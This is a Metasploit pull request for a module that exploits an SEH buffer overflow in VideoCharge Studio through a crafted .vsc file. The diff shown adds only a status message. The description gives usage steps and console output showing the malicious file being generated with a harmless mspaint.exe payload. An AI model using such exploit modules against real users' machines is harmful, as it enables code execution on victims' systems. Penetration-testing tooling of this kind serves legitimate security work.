### PR TITLE
Add VideoCharge Studio Fileformat Exploit

### DIFF
--- a/modules/exploits/windows/fileformat/videocharge_studio.rb
+++ b/modules/exploits/windows/fileformat/videocharge_studio.rb
@@ -79,6 +79,7 @@ class Metasploit3 < Msf::Exploit::Remote
 </cols>
 </config>|
 
+    print_status("Creating '#{datastore['FILENAME']}' file ...")
     file_create(file)
 
   end


### PR DESCRIPTION
PR to add VideoCharge Fileformat Buffer Overflow Exploit (SEH).

Exploit overwrites SEH chain to hit shellcode.

Vendor Homepage: http://www.videocharge.com
Original Advisory: https://www.exploit-db.com/exploits/29234/
Installer: https://www.exploit-db.com/apps/7f409732defaaa6a37d2ac0042b71588-VideoChargeStudio_Install.exe
Tested on: Windows 7 x32

Usage:
    Install target software
    Run module
    Open generated .vsc file with File->Open

Console Output:

```
msf exploit(videocharge_studio) > use exploit/videocharge_studio 
msf exploit(videocharge_studio) > show options

Module options (exploit/videocharge_studio):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   FILENAME  msf.vsc          no        The file name.


Exploit target:

   Id  Name
   --  ----
   0   VideoCharge Studio 2.12.3.685


msf exploit(videocharge_studio) > set payload windows/exec
payload => windows/exec
msf exploit(videocharge_studio) > set cmd mspaint.exe
cmd => mspaint.exe
msf exploit(videocharge_studio) > exploit

[*] Creating 'msf.vsc' file ...
[+] msf.vsc stored at /root/.msf4/local/msf.vsc
msf exploit(videocharge_studio) > 
```
